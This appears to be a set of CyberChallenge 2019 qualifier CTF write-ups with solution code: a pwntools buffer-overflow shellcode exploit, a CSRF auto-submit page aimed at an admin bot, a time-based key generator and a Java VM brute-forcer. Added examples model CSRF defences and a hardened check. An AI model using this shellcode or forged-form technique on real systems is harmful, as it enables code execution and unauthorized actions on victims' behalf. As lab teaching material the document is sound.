/*
NOTICE:
My English is fuckin bad, PLUS I wrote this in like 20 mins. Sorry if I badly fucked up all the grammar :(
Open this page with desktop-view to enjoy ASCII arts! :D
██╗ ██╗███╗ ██╗██╗ ██╗███████╗
██║ ██║████╗ ██║██║ ██╔╝██╔════╝
██║ ██║██╔██╗ ██║█████╔╝ ███████╗
██║ ██║██║╚██╗██║██╔═██╗ ╚════██║
███████╗██║██║ ╚████║██║ ██╗███████║
╚══════╝╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝
Instagram: https://instagram.com/stranck/
Telegram shitpost channel: https://t.me/Stranck
YouTube channel: https://www.youtube.com/channel/UCmMWUz0QZ7WhIBx-1Dz-IGg
██████╗ ██████╗ ██████╗ ██████╗
██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗
██║ ██║██║ ██║██║ ██║██████╔╝
██║ ██║██║ ██║██║ ██║██╔══██╗
██████╔╝╚██████╔╝╚██████╔╝██║ ██║
╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝
CHALL Write-Up
--------------
Lol I executed the command lmao
Attack Payload
--------------
ncat door.quals.cyberchallenge.it 1111
███████╗ ██████╗ ██████╗
██╔════╝██╔═══██╗██╔══██╗
███████╗██║ ██║██████╔╝
╚════██║██║ ██║██╔═══╝
███████║╚██████╔╝██║
╚══════╝ ╚═════╝ ╚═╝
CHALL Write-Up
--------------
I downloaded the executable to test it locally, and one of the first things I tried was to get a segmentation fault by inputting a long sequence of characters. It worked. So I opened it in gdb and IDA and started to reverse the code, and I noticed that at the end of the program the execution returns to 0x100100. Using GDB I noticed that the input was placed at 0x100000: hell yeah, an easy way to do a buffer overflow :D
I tried putting my shellcode payload (to get a shell) at 0x100100 but it didn't work, seems like it was cutting my input. So at 0x100100 I tried putting a jump to 0x100000 and putting the payload there, but it didn't work because python is a fucking dumbass. Instead I've put a fantastic push to the stack with the address 0x100000 and then a return instruction... It worked! :DD
Attack Payload
--------------
*/
from pwn import *
import sys

# i386 /bin/sh shellcode from pwntools; the input buffer starts at 0x100000
pl = asm(shellcraft.sh())
# Don't waste A presses. Pannen won't be happy :(
# Pad to offset 0x100 (0x100100 - 0x100000), the spot execution returns to,
# and place a "push 0x100000; ret" there so control lands back on the shellcode
s = pl + b'b' * (0x100 - len(pl)) + asm('push 0x100000') + asm('ret')
# Raw bytes on stdout (same output as Python 2's `print s`, newline included)
sys.stdout.buffer.write(s + b'\n')
/*
███╗ ██╗███████╗ █████╗ ██████╗ █████╗ ██████╗ ███████╗███████╗██████╗ ███████╗
████╗ ██║██╔════╝██╔══██╗ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔════╝██╔══██╗██╔════╝
██╔██╗ ██║███████╗███████║ ██║ ███████║██████╔╝█████╗ █████╗ ██████╔╝███████╗
██║╚██╗██║╚════██║██╔══██║ ██║ ██╔══██║██╔══██╗██╔══╝ ██╔══╝ ██╔══██╗╚════██║
██║ ╚████║███████║██║ ██║███████╗╚██████╗██║ ██║██║ ██║███████╗███████╗██║ ██║███████║
╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝
CHALL Write-Up
--------------
The first thing I noticed was that the admin wouldn't open any links outside 10.27.x.x
So I thought "What if I host a webserver?"
So I did, using python -m http.server, and checking the logs I saw that 10.27.0.1 was loading the web pages I was hosting. Then I put a redirect in js to another url and by checking the logs again I noticed that the admin requested that page too: this means he was executing the js code! I tried creating an iFrame to the original page, but obv the xss detector stopped my js code from accessing it. Then an idea came into my mind:
I copied the form from the original page into mine, but with the action tag pointing to the real submit page. Then I wrote some js code to "fill in" the form automatically and submit it, assuming that the admin was already logged in. And boom, goteeeeeeeem!
Attack Payload
--------------
*/
<html>
<body>
<!-- First attempt: frame the review page and drive its form from here.
     The script below cannot reach into the framed document, so this is disabled.
<iframe src="http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd?hire=hired!" id="asd">
</iframe>
-->
<!-- Working attempt: a copy of the original form, posting straight to the real review URL -->
<form method="POST" action="http://nsacareers.quals.cyberchallenge.it/review/00deb0dc-9c6d-4608-8f66-07add4775fbd">
<input type="checkbox" name="hire" value="hired!"> Hire
<br class="mb-2">
<input type="submit" value="Submit">
</form>
<script>
/* Frame-based version, kept for reference; it throws on the cross-origin access and does nothing.
setTimeout(function(){
try{
var frame = document.getElementById("asd");
var inner = frame.contentDocument || frame.contentWindow.document;
inner.getElementsByTagName("input")[0].setAttribute("checked", "");
inner.getElementsByTagName("form")[0].submit();
} catch (asd){}
//location.replace("done.html");
}, 3000);
*/
// Tick the checkbox and press Submit as soon as the page loads
document.getElementsByTagName("input")[0].setAttribute("checked", "");
document.getElementsByTagName("input")[1].click();
</script>
</body>
</html>
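/*
Added example (not part of the write-up, and not the challenge's code): a minimal model
of the server-side checks that would have stopped the auto-submitted form above. The
request dicts, the token scheme, and the attacker host 10.27.0.5 are all constructed here.
*/
```python
# Added example, not part of the write-up: a minimal model of the server-side
# checks that defeat an auto-submitted cross-origin form like the one above.
# Requests are plain dicts constructed here, not objects of a real framework.
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the application being protected (the host from the write-up)
SITE_ORIGIN = "http://nsacareers.quals.cyberchallenge.it"


def issue_csrf_token(session):
    """Put a fresh random token in the session and return it for embedding in the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def request_origin(request):
    """Origin from the Origin header, falling back to the Referer's scheme://host."""
    origin = request["headers"].get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = request["headers"].get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def check_state_change(request, session):
    """Return (allowed, reason) for a request to a state-changing endpoint.

    Two independent layers: the browser-supplied origin must be ours (a page
    hosted elsewhere cannot forge Origin/Referer), and the form must carry the
    token stored in the victim's session, which a cross-site page cannot read.
    """
    if request["method"] != "POST":
        return False, "state changes must be POSTed"
    if request_origin(request) != SITE_ORIGIN:
        return False, "origin mismatch"
    expected = session.get("csrf_token")
    supplied = request["form"].get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or wrong csrf token"
    return True, "ok"


def demo():
    """Run constructed forged and legitimate requests through the check."""
    session = {}                      # the admin's server-side session
    token = issue_csrf_token(session)
    # Constructed: what the admin's browser sends when a page hosted on the
    # lab network auto-clicks Submit (foreign Origin, no token).
    forged = {
        "method": "POST",
        "headers": {"Origin": "http://10.27.0.5:8000"},
        "form": {"hire": "hired!"},
    }
    # Constructed: the ?hire=hired! link variant, a GET carrying the change in the query.
    get_with_query = {
        "method": "GET",
        "headers": {"Origin": "http://10.27.0.5:8000"},
        "form": {"hire": "hired!"},
    }
    # Constructed: the same form submitted from the real review page.
    legit = {
        "method": "POST",
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"hire": "hired!", "csrf_token": token},
    }
    return {
        "forged": check_state_change(forged, session),
        "get_with_query": check_state_change(get_with_query, session),
        "legit": check_state_change(legit, session),
        # same origin but the token left out of the copied form
        "stolen_form_only": check_state_change({**legit, "form": {"hire": "hired!"}}, session),
    }
```
The two layers fail independently: the forged submission is refused on origin before the token is even consulted, and a same-origin form without the token is still refused, so a copied form only works when it can also read the victim's token.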
/*
████████╗██╗███╗ ███╗███████╗
╚══██╔══╝██║████╗ ████║██╔════╝
██║ ██║██╔████╔██║█████╗
██║ ██║██║╚██╔╝██║██╔══╝
██║ ██║██║ ╚═╝ ██║███████╗
╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝
CHALL Write-Up
--------------
I downloaded the two keys and used them to access the server. From it I downloaded the executable (time) and the other file. I executed time and inputted some random strings. It gave me an error. I assumed that the string in the other file was the password, so I inputted it and this time I didn't get an error, but it was waiting again for a String. Time to reverse! :D
I opened the file in IDA and noticed the "check1" and "check2" functions. I dug inside check2 and noticed that there was a compare between the inputted string and the result of another function: I opened it with the C view, noticing some C-standard calls (time & stuff) and a calc with the different time values. I copied the calc into a .c file, added some stuff and.... It didn't work, even though it should have worked. I checked what time it was on the server, noticing that it was in the PDT timezone. After some tries, I changed my pc to that timezone too (Changing it directly with PDT doesn't work :C) and... It didn't work either. BUT after a while I executed it again and this time it worked(?????). Probably it was because the time was not exactly synchronized
Attack Payload
--------------
*/
#include <stdio.h>
#include <time.h>

/* Recreates the value check2 compares the second input against: the calculation
 * lifted from the decompiled function, evaluated on the local broken-down time,
 * so this machine's timezone has to match the server's. */
int main(void) {
    time_t rawtime;
    struct tm *v3;

    rawtime = time(NULL);
    v3 = localtime(&rawtime);

    /* tm_year is years since 1900 and tm_mon is 0-based; the division is integer division */
    long l = v3->tm_hour + v3->tm_min
           + (v3->tm_year + v3->tm_mon - v3->tm_mday) / (v3->tm_min + 1)
           + 3735928559LL;   /* 0xDEADBEEF */

    /* first line: the password from the other file; second line: the time value in octal */
    printf("AoHnikoj7L2fVn41\n%lo\n", l);
    return 0;
}
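/*
Added example (not part of the write-up): the same calculation ported to Python and
evaluated for an explicit instant in two zones, so the timezone dependence the
write-up ran into can be reproduced without changing the system clock. The instant
and the fixed -7h/+1h offsets are constructed; the formula is the one in the C above.
*/
```python
# Added example, not part of the write-up: the time-based value from check2
# ported to Python and evaluated for an explicit instant in a chosen zone, so
# the timezone dependence can be seen without touching the system clock.
from datetime import datetime, timedelta, timezone

MAGIC = 3735928559  # 0xDEADBEEF, the constant in the decompiled formula


def c_div(a, b):
    """Integer division with C semantics (truncation toward zero, not floor)."""
    q = abs(a) // abs(b)
    return q if (a < 0) == (b < 0) else -q


def struct_tm(local):
    """The struct tm fields the formula uses, with C's conventions."""
    return {
        "tm_hour": local.hour,
        "tm_min": local.minute,
        "tm_year": local.year - 1900,  # years since 1900
        "tm_mon": local.month - 1,     # 0-based month
        "tm_mday": local.day,
    }


def time_value(local):
    """The number the binary expects on its second input line, as a decimal int."""
    t = struct_tm(local)
    return (t["tm_hour"] + t["tm_min"]
            + c_div(t["tm_year"] + t["tm_mon"] - t["tm_mday"], t["tm_min"] + 1)
            + MAGIC)


def expected_line(instant, tz):
    """Octal rendering, like the %o in the C program, for `instant` as seen in `tz`."""
    return format(time_value(instant.astimezone(tz)), "o")


# Constructed instant (UTC) and two zones: a fixed -7h offset standing in for
# PDT (zoneinfo.ZoneInfo("America/Los_Angeles") would also follow DST switches)
# and the +1h a machine in Italy would have used in March.
INSTANT = datetime(2019, 3, 20, 21, 5, 0, tzinfo=timezone.utc)
PDT = timezone(timedelta(hours=-7), "PDT")
CET = timezone(timedelta(hours=1), "CET")


def demo():
    """Same instant, two zones: the value only matches if the zone matches the server's.
    Only tm_hour and tm_min enter the formula, so a value stays valid until the
    minute rolls over; a clock that is off by more than that never matches."""
    return {
        "pdt": expected_line(INSTANT, PDT),
        "cet": expected_line(INSTANT, CET),
        "seconds_left_in_minute": 60 - INSTANT.second,
    }
```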
/*
███████╗███████╗██╗ ██╗███╗ ███╗
██╔════╝╚══███╔╝██║ ██║████╗ ████║
█████╗ ███╔╝ ██║ ██║██╔████╔██║
██╔══╝ ███╔╝ ╚██╗ ██╔╝██║╚██╔╝██║
███████╗███████╗ ╚████╔╝ ██║ ╚═╝ ██║
╚══════╝╚══════╝ ╚═══╝ ╚═╝ ╚═╝
CHALL Write-Up
--------------
TODO
Attack Payload
--------------
*/
package ovh.stranck.cyberchallenge.ezVM;

import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Scanner;

import ovh.stranck.utils.PatternBruteforcer;

/*
 * Java re-implementation of the challenge VM. check_login_key is executed with a
 * candidate key, and the program counter reached before the first failing CHK
 * tells how many of the five 4-character key segments were right, so each
 * segment can be brute-forced on its own (5 * 16^4 runs instead of 16^20).
 */
public class Main {
    // Opcodes (one byte each); operands follow inline, see the handlers below
    public static final short NOP = 0x00;
    public static final short IN  = 0x01;
    public static final short STO = 0x02;
    public static final short ADD = 0x03;
    public static final short SUB = 0x04;
    public static final short NOT = 0x05;
    public static final short AND = 0x06;
    public static final short OR  = 0x07;
    public static final short XOR = 0x08;
    public static final short CHK = 0x09;

    public static final boolean PRINT = false;   // trace every instruction when true

    public static Scanner sc = new Scanner(System.in);
    public static byte[] m = new byte[256];      // VM memory
    public static byte[] p = null;               // program bytes
    public static int pc = 0;                    // program counter
    public static String bruteforceRead;         // what IN reads instead of stdin

    public static void main(String[] args) throws Exception {
        // Program file: first argument, otherwise the author's local copy
        String path = args.length > 0 ? args[0]
                : "C:\\Users\\Luca\\Desktop\\shit\\programming\\CTF\\CyberChallenge 2019\\EzVM\\check_login_key";
        p = Files.readAllBytes(Paths.get(path));
        // execute();   // single interactive run (swap the stdin line back in inside in())

        // pc the VM only gets past when segment i of the key is correct
        int[] checkpoints = {259, 346, 440, 526, 618};
        String[] segment = {"@@@@", "@@@@", "@@@@", "@@@@", "@@@@"};
        bruteforce(checkpoints, segment, 0);
    }

    // Fix segments 0..level-1, try every 4-character value for segment `level`,
    // and recurse into the next segment whenever execution gets past its check.
    public static void bruteforce(int[] checkpoints, String[] segment, int level) {
        PatternBruteforcer pbf = new PatternBruteforcer("@ABCDEFGHIJKLMNO", 4, true);
        String s;
        while (!(s = pbf.next()).equals("")) {
            for (int i = 0; i < m.length; i++)
                m[i] = 0;
            pc = 0;
            String before = "", after = "";
            for (int i = 0; i < level; i++)
                before += segment[i] + "-";
            for (int i = level + 1; i < checkpoints.length; i++)
                after += "-" + segment[i];
            bruteforceRead = before + s + after;
            if (execute() == 0) {
                System.out.println("FOUND: " + bruteforceRead);
            } else if (pc > checkpoints[level] && level + 1 < checkpoints.length) {
                segment[level] = s;
                bruteforce(checkpoints, segment, level + 1);
            }
        }
    }

    // Run from pc to the end of the program or the first failing CHK; returns chk()'s last result
    public static int execute() {
        int ret = 0;
        loop:
        while (pc < p.length) {
            if (PRINT) System.out.print(pc + ":\t");
            switch (p[pc++]) {
                case NOP: nop(); break;
                case IN:  in();  break;
                case STO: sto(); break;
                case ADD: add(); break;
                case SUB: sub(); break;
                case NOT: not(); break;
                case AND: and(); break;
                case OR:  or();  break;
                case XOR: xor(); break;
                case CHK:
                    ret = chk();
                    if (ret == 1) {
                        if (PRINT) System.out.println("Exiting at: " + pc);
                        break loop;
                    }
                    break;
                default:
                    if (PRINT) System.out.println(p[pc - 1] + ":\tCommand not found");
            }
        }
        return ret;
    }

    public static void nop() {
        if (PRINT) System.out.println("NOP");
    }

    // IN length addr: copy `length` input bytes into m[addr..]
    public static void in() {
        short length = (short) (p[pc++] & 0xff);
        short mem = (short) (p[pc++] & 0xff);
        if (PRINT) System.out.println("IN " + length + " " + mem);
        // Interactive mode: String in = sc.nextLine();
        String in = bruteforceRead;
        in = in.substring(0, length);
        byte[] b = in.getBytes();
        for (int i = 0; i < b.length; i++)
            m[mem++] = b[i];
    }

    // STO byte addr: store an immediate byte
    public static void sto() {
        byte b = p[pc++];
        short mem = (short) (p[pc++] & 0xff);
        if (PRINT) System.out.println("STO " + (short) (b & 0xff) + " " + mem);
        m[mem] = b;
    }

    // ADD x y z: m[z] = m[x] + m[y]; SUB, AND, OR, XOR below follow the same layout
    public static void add() {
        short x = (short) (p[pc++] & 0xff);
        short y = (short) (p[pc++] & 0xff);
        short z = (short) (p[pc++] & 0xff);
        if (PRINT) System.out.println("ADD " + x + " " + y + " " + z);
        m[z] = (byte) (m[x] + m[y]);
    }

    public static void sub() {
        short x = (short) (p[pc++] & 0xff);
        short y = (short) (p[pc++] & 0xff);
        short z = (short) (p[pc++] & 0xff);
        if (PRINT) System.out.println("SUB " + x + " " + y + " " + z);
        m[z] = (byte) (m[x] - m[y]);
    }

    // NOT addr: bitwise complement in place
    public static void not() {
        short mem = (short) (p[pc++] & 0xff);
        if (PRINT) System.out.println("NOT " + mem);
        m[mem] = (byte) ~m[mem];
    }

    public static void and() {
        short x = (short) (p[pc++] & 0xff);
        short y = (short) (p[pc++] & 0xff);
        short z = (short) (p[pc++] & 0xff);
        if (PRINT) System.out.println("AND " + x + " " + y + " " + z + "\t(" + (short) (m[x] & 0xff) + "\t" + (short) (m[y] & 0xff) + ")");
        m[z] = (byte) (m[x] & m[y]);
    }

    public static void or() {
        short x = (short) (p[pc++] & 0xff);
        short y = (short) (p[pc++] & 0xff);
        short z = (short) (p[pc++] & 0xff);
        if (PRINT) System.out.println("OR " + x + " " + y + " " + z + "\t(" + (short) (m[x] & 0xff) + "\t" + (short) (m[y] & 0xff) + ")");
        m[z] = (byte) (m[x] | m[y]);
    }

    public static void xor() {
        short x = (short) (p[pc++] & 0xff);
        short y = (short) (p[pc++] & 0xff);
        short z = (short) (p[pc++] & 0xff);
        if (PRINT) System.out.println("XOR " + x + " " + y + " " + z + "\t(" + (short) (m[x] & 0xff) + "\t" + (short) (m[y] & 0xff) + ")");
        m[z] = (byte) (m[x] ^ m[y]);
    }

    // CHK x y: 1 (stop, key wrong) if m[x] != m[y], else 0 (keep going)
    public static int chk() {
        short x = (short) (p[pc++] & 0xff);
        short y = (short) (p[pc++] & 0xff);
        if (PRINT) System.out.println("CHK " + x + " " + y + "\t(" + (short) (m[x] & 0xff) + "\t" + (short) (m[y] & 0xff) + ")");
        if (m[x] != m[y])
            return 1;
        return 0;
    }
}
package ovh.stranck.utils;

/*
 * Enumerates every string of the given length over a charset, one call to next()
 * at a time; index[] is an odometer over charset positions (-1 = position not started).
 */
public class PatternBruteforcer {
    private String charset;
    private boolean overflow = false;   // set once every combination has been produced
    private int index[];
    private int length;

    public PatternBruteforcer(String charset, int length, boolean fixedLength) {
        this.charset = charset;
        this.length = length;
        index = new int[length];
        index[0] = -1;
        // With fixedLength the higher positions start at charset[0]; otherwise they
        // start absent, so shorter strings come out first
        for (int i = 1; !fixedLength && i < length; i++)
            index[i] = -1;
    }

    // Current string; index[0] is the rightmost character
    public String getCurrent(boolean of) {
        String s = "";
        for (int n = 0; !of && n < length; n++)
            if (index[n] >= 0)
                s = charset.charAt(index[n]) + s;
        return s;
    }

    // Advance the odometer and return the new string, or "" once everything is exhausted
    public synchronized String next() {
        if (!this.overflow) {
            boolean overflow = true;
            for (int i = 0; i < length && overflow; i++) {
                if (++index[i] >= charset.length()) {
                    index[i] = 0;
                    overflow = true;
                } else {
                    overflow = false;
                }
            }
            this.overflow = overflow;
        }
        return getCurrent(overflow);
    }

    public boolean isDone() {
        return overflow;
    }

    // Same enumeration as a callback loop: a.execute(s) is called for every string
    public static void bruteforceFromCharsetLength(String charset, int length, boolean fixedLength, Action a) {
        int[] index = new int[length];
        index[0] = -1;
        for (int i = 1; !fixedLength && i < length; i++)
            index[i] = -1;
        boolean overflow = false;
        while (!overflow) {
            overflow = true;
            for (int i = 0; i < length && overflow; i++) {
                if (++index[i] >= charset.length()) {
                    index[i] = 0;
                    overflow = true;
                } else {
                    overflow = false;
                    String s = "";
                    for (int n = 0; n < length; n++) {
                        if (index[n] >= 0)
                            s = charset.charAt(index[n]) + s;
                    }
                    a.execute(s);
                }
            }
        }
    }
}

/* Callback type used by bruteforceFromCharsetLength. The paste does not include it,
 * so this minimal version is assumed here to make the class compile. */
interface Action {
    void execute(String s);
}
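/*
Added example (not part of the write-up, and not the challenge's bytecode): a Python
model of the same VM, built from the opcode semantics of the Java above, that shows
why the per-segment search works and what stops it. The two bytecode programs and the
demo key "BEEF" are constructed here. The leaky program checks the key one byte at a
time and exits at the first mismatch, so the pc it stops at says how much of the key
was right; the hardened program folds every byte's difference into one accumulator
and checks it once at the end, so it always stops at the same pc. The demo program
stores the key with plain STO constants for brevity; the point is the early-exit oracle.
*/
```python
# Added example, not part of the write-up: a Python model of the same VM, used to
# show why the per-segment search works. The bytecode programs are constructed
# here for a demo key, not the challenge's check_login_key.
from itertools import product

NOP, IN, STO, ADD, SUB, NOT, AND, OR, XOR, CHK = range(10)

CHARSET = b"@ABCDEFGHIJKLMNO"   # the 16 symbols the write-up searched over
SECRET = b"BEEF"                # constructed demo key (drawn from CHARSET)


def run(program, user_input):
    """Execute the bytecode on `user_input`. Returns (status, pc): status 1 and the
    pc just past the CHK that failed, or status 0 and the final pc if none failed."""
    m = bytearray(256)
    pc = 0
    while pc < len(program):
        op = program[pc]
        pc += 1
        if op == IN:                           # IN len addr: copy input bytes into memory
            length, addr = program[pc], program[pc + 1]
            pc += 2
            data = user_input[:length]
            m[addr:addr + len(data)] = data
        elif op == STO:                        # STO byte addr: immediate store
            val, addr = program[pc], program[pc + 1]
            pc += 2
            m[addr] = val
        elif op == NOT:                        # NOT addr: complement in place
            addr = program[pc]
            pc += 1
            m[addr] = ~m[addr] & 0xFF
        elif op in (ADD, SUB, AND, OR, XOR):   # op x y z: m[z] = m[x] <op> m[y]
            x, y, z = program[pc], program[pc + 1], program[pc + 2]
            pc += 3
            a, b = m[x], m[y]
            m[z] = {ADD: a + b, SUB: a - b, AND: a & b, OR: a | b, XOR: a ^ b}[op] & 0xFF
        elif op == CHK:                        # CHK x y: stop with failure if m[x] != m[y]
            x, y = program[pc], program[pc + 1]
            pc += 2
            if m[x] != m[y]:
                return 1, pc
        # NOP and unknown opcodes fall through, like the Java default branch
    return 0, pc


def compile_leaky(secret):
    """One CHK per byte, exiting at the first mismatch: pc reveals the mismatch position."""
    prog = bytearray([IN, len(secret), 0x00])
    for i, ch in enumerate(secret):
        prog += bytes([STO, ch, 0x80, CHK, i, 0x80])
    return bytes(prog)


def compile_hardened(secret):
    """OR every byte's XOR difference into an accumulator and CHK it once at the end:
    execution always stops at the same pc, so nothing about the position leaks."""
    prog = bytearray([IN, len(secret), 0x00, STO, 0, 0x81])      # m[0x81] = accumulator
    for i, ch in enumerate(secret):
        prog += bytes([STO, ch, 0x80, XOR, i, 0x80, 0x82, OR, 0x81, 0x82, 0x81])
    prog += bytes([STO, 0, 0x83, CHK, 0x81, 0x83])
    return bytes(prog)


def recover_by_pc(program, length, seg_len, charset=CHARSET):
    """The write-up's strategy: search one segment at a time, keeping the value that
    lets execution get furthest. Returns (recovered_key, vm_runs)."""
    known = b""
    runs = 0
    while len(known) < length:
        best, best_pc = None, -1
        for combo in product(charset, repeat=seg_len):
            cand = (known + bytes(combo)).ljust(length, b"@")   # pad the unknown tail
            runs += 1
            status, pc = run(program, cand)
            if status == 0:
                return cand, runs
            if pc > best_pc:
                best, best_pc = bytes(combo), pc
        known += best
    return known, runs


def demo():
    """Segment search against both programs, next to the size of a flat search."""
    leaky, hardened = compile_leaky(SECRET), compile_hardened(SECRET)
    return {
        "leaky": recover_by_pc(leaky, len(SECRET), 2),
        "hardened": recover_by_pc(hardened, len(SECRET), 2),
        "exhaustive_runs": len(CHARSET) ** len(SECRET),
    }
```
Against the leaky program the search recovers the key in a few hundred VM runs instead of 16^4, exactly the effect the five checkpoints exploit above; against the hardened program every candidate stops at the same pc, the oracle picks an arbitrary segment, and the result is wrong.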